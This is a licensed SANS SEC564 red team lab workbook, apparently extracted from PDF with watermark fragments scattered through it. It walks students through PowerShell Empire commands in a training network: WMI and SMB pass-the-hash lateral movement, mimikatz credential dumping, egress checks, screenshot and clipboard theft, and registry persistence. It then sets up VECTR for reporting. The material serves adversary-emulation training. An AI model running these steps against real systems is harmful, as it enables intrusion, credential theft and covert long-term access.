090aff33bcb6e401ded410120bc9a268

m

>

Ap ril

[email protected] co

 

o.

  3. If your agents are not calling back (Last Seen time is yellow or red), run through Lab 2.1 and let your  instructor know if you still have trouble.       

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-2

© SANS Institute 2020

Lab – On Your Own 

  Pivot to other hosts, attempt to access credentials, avoid defenses. Answer these questions:    What system is Endpoint02 connected to?    _____________________________________________________________________________________    Can you pivot to it? How?    _____________________________________________________________________________________    What privilege do you have on TargetServer01? How?    _____________________________________________________________________________________    What credentials are available on TargetServer01? How did you obtain them?    _____________________________________________________________________________________    Can you leverage those credentials or hashes to move laterally to another system?    _____________________________________________________________________________________    Move laterally to TargetServer02; how did you do it?    _____________________________________________________________________________________    How can you get an agent on WebServer01?    _____________________________________________________________________________________      Hints: 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

(Empire: dani) > usemodule  Type a space after the command and hit Tab‐Tab

Li

(Empire: dani) > usemodule lateral_movement/ (Empire: dani) > usemodule credentials/

live

(Empire: dani) > usemodule management/ (Empire: listeners) > uselistener redirector  

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-3

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

  4. Understand what a module will do, execute it on your own host (Windows VM), and then execute it on the  target system. PowerShell Empire modules are located in this directory:    /opt/empire/lib/modules/powershell   To interact with an agent within Empire:    (Empire) > interact To go back to the agents prompt, use “back” command: 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] o.

co

m

>

Ap ril

(Empire: Win10) > back   5. Determine what system Endpoint02 is connected to:    (Empire) > interact Dani  Agent name of Endpoint02

22829180 i< an

nm

ak

er

@ ya

ho

(Empire: Dani) > shell net use   Shell can be used to execute anything that can be run in a cmd.exe    Record the result:   

nc o

ln

M

az

ze

Lincoln Mazzei

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

 

Li

6. We will try to pivot with the current logged‐in user of Endpoint02 to TargetServer01.      Review lateral movement modules in Empire: 

live

(Empire: Dani) > usemodule lateral_movement/   Use the Invoke WMI module:  (Empire: Dani) > usemodule lateral_movement/invoke_wmi SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-4

© SANS Institute 2020

(Empire: powershell/lateral_movement/invoke_wmi) > info Set the options: 

(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http

090aff33bcb6e401ded410120bc9a268 (Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName TargetServer01

26 ,2 02 0

Note the Username and Password do not need to be set as you will use the credentials of the current user  of Endpoint02. Execute invoke WMI:  (Empire: powershell/lateral_movement/invoke_wmi) > execute

[email protected] o.

co

m

>

Ap ril

Record the result:   

nm

ak

er

@ ya

ho

22829180 Go back to agents screen: 

 

i< an

 

Lincoln Mazzei M

ln

(Empire: Dani) > back

az

ze

(Empire: powershell/lateral_movement/invoke_wmi) > back

nc o

(Empire: agents) > list

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK   The * next to the Username means it has administrative privileges.    7. With access to a new system, perform discovery again. Go to Lab 2.1 and ensure all actions are  documented. An agent with administrator privileges will be able to perform more modules than a non‐ privileged agent.     Rename the new agent:   

live

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-5

© SANS Institute 2020

(Empire) > rename targetserver01

  Take the time to run some of the those situational awareness modules:    (Empire) > interact targetserver01

090aff33bcb6e401ded410120bc9a268 (Empire: targetserver01) > usemodule situational_awareness/  

26 ,2 02 0

  8. Obtain credentials with Mimikatz: 

(Empire) > interact targetserver01

[email protected] Ap ril

(Empire: targetserver01) > mimikatz   

o.

co

m

>

Mimikatz and many of the credentials modules require elevated privielege and may require you to be on a  64‐bit process (if the OS is 64 bit).    Record the result. Note the result from this module is extensive. You may want to view the agent.log file  located at /opt/empire/downloads/    Try other modules in credentials/    (Empire: targetserver01) > usemodule credentials/

nm

ak

er

@ ya

ho

22829180 i< an

(Empire: targetserver01) > info

Lincoln Mazzei

(Empire: targetserver01) > run 

nc o

ln

M

az

ze

  Credentials (cleartext, hashes, etc) are saved in the Credential Store and have a credential ID. View them  with the creds command:    (Empire: targetserver01) > creds   

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

    9. Leverage Georgy’s hashes to log in to TargetServer02. Most organizations should not allow servers to  connect to the internet whether in DMZ or Internal Network. Even if they allow outbound connections  from servers, it will look suspicious. Create a listener that will pivot through your current agent (your agent  must have admin privileges).    Go to listeners prompt:    (Empire: targetserver01) > listeners

live

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-6

© SANS Institute 2020

Go to listeners prompt: 

(Empire: listeners) > uselistener redirector   Configure the redirector:    (Empire: listeners/redirector) > info

090aff33bcb6e401ded410120bc9a268 (Empire: listeners/redirector) > set Listener http

26 ,2 02 0

(Empire: listeners/redirector) > set internalIP 192.168.5.20 (Empire: listeners/redirector) > set Name targetserver01  Agent with  privilege

Ap ril

[email protected] o.

co

m

>

(Empire: listeners/redirector) > set ListenPort 8X  X is the last octect of  your IP Address    Note: the reason the listener port must be different is because only one process can bind to a unique  port at a time. In a realistic red team exercise, one would bind to port 80 as shown in below screenshot

@ ya

ho

22829180 i< an

nm

ak

er

(Empire: listeners/redirector) > execute   

nc o

ln

M

az

ze

Lincoln Mazzei   List listeners:    (Empire: listeners/redirector) > back   (Empire: listeners/redirector) > list

 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   Go to agents prompt:  (Empire: listeners) > agents SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-7

© SANS Institute 2020

Interact with the pivot agent: 

(Empire: agents) > interact targetserver01

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] Ap ril

Let’s use a different module for lateral movement, SMB Exec: 

>

(Empire: targetserver01) > usemodule lateral_movement/invoke_smbexec

o.

co

m

  Configure for pivot:    (Empire: powershell/lateral_movement/invoke_smbexec) > info

@ ya

ho

22829180 nm

ak

er

(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName TargetServer02

i< an

(Empire: powershell/lateral_movement/invoke_smbexec) > set Username georgy

Lincoln Mazzei M

az

ze

(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain SEC564Target

nc o

ln

(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash (Empire: powershell/lateral_movement/invoke_smbexec) > set Listener targetserver01

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

(Empire: powershell/lateral_movement/invoke_smbexec) > info

live

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-8

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

Ap ril

[email protected] o.

co

m

>

(Empire: powershell/lateral_movement/invoke_smbexec) > execute

i< an

nm

ak

er

@ ya

ho

22829180 Lincoln Mazzei az

ze

 

ln

M

(Empire: powershell/lateral_movement/invoke_smbexec) > back

nc o

(Empire: targetserver01) > back  

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

(Empire: agents) > list

live   (Empire: agents) > rename targetserver02   10. As new systems are compromised and new privileges gained, you need to go back and repeat steps from  previous labs on the new systems such as discovery, host and network situational awareness, etc.  Document everything you do, whether it works or not. This will be required for the final lab.  SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-9

© SANS Institute 2020

Bonus 

Attempt to compromise the other hosts on the SEC564 Target. Other hosts may be hardened, have local  firewalls, and be more secure than the step‐by‐step lab hosts. This will require thinking outside the box,  performing defense evasion. Attempt to obtain Domain Admin on Active Directory.  

090aff33bcb6e401ded410120bc9a268 Conclusion 

[email protected] Agent   

TTP/Command   

Result   

Ap ril

Time   

o.

co

m

>

Date   

26 ,2 02 0

In this lab, you moved laterally by pivoting through your beachhead (Initial Access host) to other systems. You  accessed credentials and used those credentials to access new systems. You attempted to evade detection on  various target systems within SEC564 Target. You took solid notes as all of this information will be required for  Exercise Closure and for the following steps in the Adversary Emulation. 

 

 

er

 

 

i< an

nm

ak

 

@ ya

ho

22829180

 

 

 

 

nc o

ln

 

M

az

ze

Lincoln Mazzei

ce

 

 

 

 

Li

 

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live  

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-10

© SANS Institute 2020 Lab 2.4: Action on Objectives

Objectives 

090aff33bcb6e401ded410120bc9a268   

Determine what ports are allowed outbound from target environment  Collect and exfiltrate sensitive information  Obtain persistent, long‐term access to the target environment 

26 ,2 02 0

  This lab will focus on the final portion of the Testing Phase of a Red Team Adversary Emulation Exercise where  you will try to reach the objectives of the exercise and adversary: Establishing persistent access to partners  and/or suppliers of targets for mounting supply chain attacks. Not every TTP will work and those must be  documeneted as well. This lab builds on the previous labs.  

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 Threat  Closure i< an

nm

ak

er

Intelligence

nc o

ln

M

az

ze

Lincoln Mazzei Testing Planning To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

 

     

Li

TTPs Emulated in this Lab  T1002 – Data Compressed: WinRAR to compress data prior to exfiltration  T1048 – Exfiltration Over Alternative Protocol: FTP to exfiltrate files   

live

SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-1

Lab Setup 

© SANS Institute 2020

  1. If Empire is running, skip this step. If Empire is not running, launch it:    $ sudo empire   2. Ensure your agents are calling back. To see your active agents, type agents:    (Empire) > agents   You should see your agents:   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] ho

22829180

 

i< an

nm

ak

er

@ ya

  3. If your agents are not calling back (Last Seen time is yellow or red), run through Lab 2.1 and let your  instructor know if you still have trouble.       

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-2

© SANS Institute 2020

Lab – On Your Own 

  Pilfer data from compromised systems for exfiltration and establish long‐haul persistent access to target  environment. Answer these questions:    What ports are allowed outbound from the SEC564 Target network?    _____________________________________________________________________________________    Is FTP possible outbound? Why or why not? If so, how?    _____________________________________________________________________________________    Did you identify any sensitive information through screenshots? If so, what?    _____________________________________________________________________________________    _____________________________________________________________________________________    Did you identify any sensitive information through clipboard theft?    _____________________________________________________________________________________    Is compressing via RAR a good idea for this environment?    _____________________________________________________________________________________    How did you establish long‐term persistence?    _____________________________________________________________________________________    Hints:    (Empire) > interact

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

(Empire: win10) > usemodule  Type a space after the command and hit Tab‐Tab

Li

(Empire: win10) > usemodule collection/ (Empire: win10) > usemodule exfiltration/

live

 

(Empire: win10) > usemodule persistence/  

SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-3

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

  4. Determine outbound ports and protocols allowed from Sec564 Target:    (Empire) > interact Dani  your Endpoint02 agent

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

(Empire: target2) > usemodule exfiltration/egresscheck   (Empire: powershell/exfiltration/egresscheck) > info

(Empire: powershell/exfiltration/egresscheck) > set ip 10.0.0.X  Your  Linux IP

[email protected] Ap ril

(Empire: powershell/exfiltration/egresscheck) > set portrange 8080

o.

co

m

>

On a separate terminal, escalate privileges to root:    $ sudo su –   Run TCPDump with a filter to see incoming packets for the specified port:    # tcpdump -nn -i eth0 port 8080

er

@ ya

ho

22829180 i< an

nm

ak

For remote students, use the tap0 interface instead:    # tcpdump -nn -i tap0 port 8080   Back in Empire, run the module: 

az

ze

Lincoln Mazzei ln

M

(Empire: powershell/exfiltration/egresscheck) > run

nc o

[>] Module is not opsec safe, run? [y/N] y  

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

You will notice the command is sent on the next check in, the results come in on the subsequent check ins.     Review tcpdump output to know if the port is allowed outbound from the target host:   

live

  Check if the default FTP port is allowed outbound. Set the TCPDump filter:    # Ctrl-C

  

# tcpdump -nn -i eth0 port 21   SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-4

© SANS Institute 2020

For remote students, use the tap0 interface instead:    # tcpdump -nn -i tap0 port 21    In Empire:    (Empire: powershell/exfiltration/egresscheck) > set portrange 21   (Empire: powershell/exfiltration/egresscheck) > run

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[>] Module is not opsec safe, run? [y/N] y   Look at TCPDump and notice that no packets came in, meaning the port is blocked:   

m

>

Ap ril

[email protected]  

o.

co

  Try checking other ports by setting TCPDump filter to more ports and setting the portrange in Empire.    Go back to the main agent prompt:    (Empire: powershell/exfiltration/egresscheck) > back

ak

er

@ ya

ho

22829180 i< an

nm

  5. Take screenshots of endpoints to see what the end users are doing and may provide sensitive information: 

Lincoln Mazzei M

az

ze

(Empire: Dani) > usemodule collection/screenshot   (Empire: powershell/collection/screenshot) > info

nc o

ln

(Empire: powershell/collection/screenshot) > run

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

 

ce

 

Li

On a separate terminal, open the file:    # cd /opt/empire/downloads//screenshot # firefox

SEC564 - © 2019 Jorge Orchilles

live

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-5

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

co

m

>

Ap ril

[email protected] o.

*Note the result will be different based on what the end user has open 

ho

22829180 @ ya

(Empire: powershell/collection/screenshot) > back

ak

er

6. Steal clipboard data from end users as they may copy and paste passwords or other sensitive information: 

i< an

nm

(Empire: Dani) > usemodule collection/clipboard_monitor   (Empire: powershell/collection/clipboard_monitor) > info

ze

Lincoln Mazzei ln

M

az

(Empire: powershell/collection/clipboard_monitor) > set CollectionLimit 1

nc o

(Empire: powershell/collection/clipboard_monitor) > run

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live *Note the result will be different based on what the end user has on clipboard 

 

(Empire: powershell/collection/screenshot) > back   SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-6

© SANS Institute 2020

7. Create a long‐haul listener:     (Empire: Dani) > listeners   (Empire: listeners) > uselistener http    (Empire: listeners/http) > info

090aff33bcb6e401ded410120bc9a268 (Empire: listeners/http) > set Name longhttp (Empire: listeners/http) > set DefaultDelay 120

[email protected] Ap ril

(Empire: listeners/http) > set Port 8080  a TCP port confirmed allowed  outbound 

>

 

26 ,2 02 0

Please note that options from the previous listener will be set; you only need to change the following: 

co

m

(Empire: listeners/http) > set Host https://10.0.0.X:8080  Your Linux IP   

o.

(Empire: listeners/http) > info

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

  (Empire: listeners/http) > execute   (Empire: listeners/http) > back    (Empire: listeners) > list SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-7

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 If you see an error, it may be because your SimpleHTTPServer is still bound to TCP port 8080. Go to that  terminal and Ctrl‐C to kill it.    (Empire: listeners) > back

>

Ap ril

[email protected] o.

co

m

  8. Obtain long‐haul persistence on a reliable system with elevated privileges. A great blogpost on various  methods is available here: https://www.harmj0y.net/blog/empire/nothing‐lasts‐forever‐persistence‐with‐ empire/     (Empire) > interact targetserver01  your TargetServer01 agent

ak

er

@ ya

ho

22829180 i< an

nm

(Empire: targetserver01) > usemodule persistence/elevated/registry*   (Empire: powershell/persistence/elevated/registry) > info

Lincoln Mazzei M

az

ze

(Empire: powershell/persistence/elevated/registry) > set Listener longhttp

nc o

ln

(Empire: powershell/persistence/elevated/registry) > set KeyName AutoUpdates2XX  your student number    (Empire: powershell/persistence/elevated/registry) > set RegPath HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\AutoUpdatesX  X is the last  octect of your IP Address 

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

(Empire: powershell/persistence/elevated/registry) > run [>] Module is not opsec safe, run? [y/N] y

live

9. Kill the current agent to evade detection:  SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-8

© SANS Institute 2020

 

(Empire: powershell/persistence/elevated/registry) > back (Empire: targetserver01) > back   (Empire) > kill targetserver01  

090aff33bcb6e401ded410120bc9a268  

[>] Kill agent 'targetserver01'? [y/N] y

26 ,2 02 0

 

Ap ril

[email protected] o.

co

m

>

    You will not obtain the long‐haul agent until TargetServer01 restarts. This may occur during the lab at the  discretion of the SEC564 Instructor. Remote students perform this against Win10. 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-9

Bonus 

© SANS Institute 2020

  Compromise all systems in SEC564 Target. Create a network diagram to show complete compromise. Here is  an example of what a diagram for SEC564 Target may look like:     

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Attackers 10.0.0.1/24

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 TargetDMZ 172.16.0.1/24

WebServer01 172.16.0.30 www.sec564target.com

i< an

nm

ak

er

EmailServer01 192.168.5.40 Exchange 2016

M

TargetLAN 192.168.5.1/24

nc o

ln

TargetServer01 192.168.5.20 Windows Server 2016 Open File Share

az

ze

Lincoln Mazzei TargetServer02 192.168.5.30 Windows Server 2012

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Endpoint01 192.168.5.100 Georgy

   

 

SEC564 - © 2019 Jorge Orchilles

TargetDC 192.168.5.10 Windows Server 2016

live

Endpoint02 192.168.5.101 Dani

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

 

2.4-10

© SANS Institute 2020

Conclusion 

In this lab, you collected sensitive information and exfiltrated it through channels allowed from SEC564 Target.  You should have achieved the Red Team Exercise objectives emulating APT33 capabilities and intent.  Ensure all TTPs are documented as they will be required to complete the final lab.  

090aff33bcb6e401ded410120bc9a268 Time   

Agent   

TTP/Command   

Result   

26 ,2 02 0

Date   

 

 

 

Ap ril

 

o.

co

m

>

 

[email protected]

 

 

er

 

 

i< an

nm

ak

 

@ ya

ho

22829180

 

 

 

 

nc o

ln

 

M

az

ze

Lincoln Mazzei

ce

 

 

 

 

Li

 

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live  

SEC564 - © 2019 Jorge Orchilles

Lab 2.4: Action on Objectives

Licensed To: Lincoln Mazzei April 26, 2020

2.4-11

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

er

@ ya

ho

22829180 i< an

nm

ak

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Lab 2.5: Exercise Closure

Objectives 

090aff33bcb6e401ded410120bc9a268 Introduction to VECTR   Understand VECTR Core Concepts  Understand VECTR Workflow   Configure VECTR for use  Create a VECTR Campaign for an Adversary Emulation Plan  Explore VECTR’s Reporting and Timeline Capabilities  Learn how to use VECTR to track repeatable Adversary Emulations (Replay, Retest, Purple Teaming) 

26 ,2 02 0

      

[email protected] o.

co

m

>

Ap ril

  The final phase of an Adversary Emulation Red Team Exercise is Exercise Closure.  VECTR can be used during all  phases of an Adversary Emulation. This lab will introduce VECTR for the Closure Phase, but will cover how to  use it for entire Red Team Exercises. 

nm

i< an

Closure

ak

er

@ ya

ho

22829180 Threat  Intelligence

nc o

ln

M

az

ze

Lincoln Mazzei Testing

Planning

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

 

live

Exercise Setup 

Start the local instance of VECTR by typing the following in a terminal on your Linux VM:    # cd /opt/vectr/app # sudo docker-compose -f docker-compose.yml -f devSsl.yml -p vectr up -d SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-1

© SANS Institute 2020

Introduction to VECTR 

VECTR is a platform designed to facilitate Red and Blue security teams through comprehensive Purple Team  styled Adversary Emulations. Its purpose is to document attacks, gauge the effectiveness of defensive tools,  strengthen security, and improve detection capabilities through current and historical performance tracking.    VECTR works to serve as a system of record for the process of testing organizational information security. It's  designed to use existing data and knowledge, including community open source data, standard red teaming  practices, and emerging purple teaming knowledge, and assist organizations in continually adapting their Red  Team Exercises to match realistic adversaries. The software design is meant to allow users to both capture the  results of manual audit type tests from third parties, easily record the results of novel testing like Red Team  Exercises, and expand beyond what VECTR includes by default.  Rather than being a black box simulation tool,  it's a repository for your organizational information security test cases, testing history, and associated Blue  Team analytics to detect those activities.  It can also serve as a facilitator for guiding security operations teams  to better outcomes.   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

>

Ap ril

[email protected] co

m

Understanding VECTR Core Concepts

o.

In VECTR, a Database is a Target Environment. Databases represent major organizational units or groupings of  different assessment types within VECTR. Before beginning a test, this is where information is gathered about  the environment and where boundaries are being drawn. This includes workstations, servers, networks, and  any other targets being tested. It also includes information about defense tools, logging, and alerting  capabilities.     The tests that are run will be stored in an Assessment Group (also referred to as an Assessment) in VECTR,  and each Database is meant to hold multiple Assessment Groups.     Most organizations will only require 1 database, but organizations with many independent subsidiaries, or  different technologies and security configurations may find it helpful to operate multiple databases.    Example Database names:   Global   NA   EMEA   M&A Environment   CorpHQ   Purple Team   Red Team   Appsec/Crown Jewels Testing   Jorge's Tiger Team DB   Barry's Secret Missions DB    An Assessment Group is the scope of a security testing event. This includes a list of Campaigns and tests that  are to be run in an environment.  Multiple Assessment Groups may be run at once.  In VECTR, it’s helpful to  organize these by the name of the activity and when it’s being run.   

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-2

© SANS Institute 2020

Example Assessment Group names:   May 2019 Red Team for Audit   May/June 2019 ‐ External Purple Team   SOC ‐ Continuous Purple Team   APT33 Emulation June 2019    APT33 Emulation September 2019    A Campaign is a group of tests to be run within an Assessment Group. This is a loose organizational data  structure, similar in concept to a file folder in general computing or a test suite in software quality assurance.  Tests can be grouped into Campaigns by adversary, malware, test type, kill chain phases, and any other  structure that makes sense for the testing organization.    Example Campaign names:   APT 39 Adversary Emulation    Emotet Malware Emulation   Multiple Variations of Port Scans   Multiple Variations of Downloaded Phishing Payloads   MITRE ATT&CKTM Discovery    A Test Case is an individual test to be run within a Campaign. A Test Case includes a set of commands or  instructions and any necessary accompanying data designed to help an operator perform a specific,  repeatable security testing activity. Once a Test Case is performed, VECTR allows the capture of additional  information like when the test was performed and if it was detected by defense tools.    In the context of the MITRE ATT&CKTM Framework, a Test Case represents a specific, repeatable instance of an  attack technique. Different Test Case variants can map to the same MITRE ATT&CKTM technique ID. In VECTR,  it’s helpful to name the activity for either the exact activity being performed or the threat that’s being  emulated.    Example Test Case names:   APT1 ‐ Account Discovery using Net    Wannacry Lateral Movement using DoublePulsar   Noisy NMAP port scan of 1000 ports   Compress Sensitive PCI data on Endpoint with Zip   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-3

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

co

m

>

Ap ril

[email protected] o.

 

ho

22829180 @ ya

Understand VECTR Workflow

i< an

nm

ak

er

The key steps to successfully using VECTR in its most common use scenario are as follows:  1. Define a Database for the environment being tested  2. Plan the Assessment scope  3. Begin testing the target environment and record activities within the appropriate Assessment  4. Generate reports based on VECTR test data  5. Use VECTR to inform remediation efforts by Blue Team     Planning the Assessment scope can be done manually within VECTR by advanced operators and can also be  heavily informed by external resources like Threat Intelligence.  For the purposes of this lab, the scope of the  testing events is the emulation of the APT33/Elfin adversary against SEC564 Target.     An Adversary Emulation campaign is a common activity for organizations in impacted industries; therefore, it  may be desirable to reproduce it on a regular basis.  Any activities that may be repeated or reused in VECTR  should be stored in the Administration section as templates.      In this lab, you will create two APT33/Elfin campaign templates; one manually and one via importing threat  intelligence. You will use the campaign templates to create an assessment to record all the Red Team activites  performed. Blue Team will be able to provide data to populate the records during the Analysis and Response  phase. Once everything is documented, you will view reports and identify any historical trends that may be  interesting to the target organization.       

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-4

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

1. Navigate to the local VECTR instance using Firefox:     https://vectr.local:8081   2. Click LOGIN:   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] ho

22829180

 

nm

ak

er

@ ya

  3. Log in to VECTR:    Username: admin

i< an

Password: sec564

Lincoln Mazzei nc o

ln

M

az

ze

You will be taken to the Assessments page: 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-5

© SANS Institute 2020

4. Create a database for SEC564: 

  To administer the databases (change current database, change the name of database, back up a database  or delete a database), click the database icon on the top right of VECTR: 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

Ap ril

[email protected] m

>

 

o.

co

To create a new database, something that should be done for each organization, customer, and/or client,  click “Select Session Database” and click the + sign: 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei  

  

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Type the new name in the Database Name field, click Submit, and then Done: 

live  

SEC564 - © 2019 Jorge Orchilles

Lab 2.5: Exercise Closure

 

Licensed To: Lincoln Mazzei April 26, 2020

2.5-6

© SANS Institute 2020

To administer the organizations, click the profile icon on the top right of VECTR and select “Set  Organization”: 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

 

Create a new organization, click the + sign. Fill out the Name, Description, Abbreviation, URL, and add Red  Team Members. Click “Save” when done: 

o.

co

m

>

Ap ril

[email protected]

ak

er

@ ya

ho

22829180 nm

 

i< an

 

Lincoln Mazzei nc o

ln

M

az

ze

Now set the organization by clicking the profile icon on the top right of VECTR, select “Set Organization”,  and check the new organization just created. 

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

 

Create a VECTR Campaign for an Adversary Emulation Plan

live

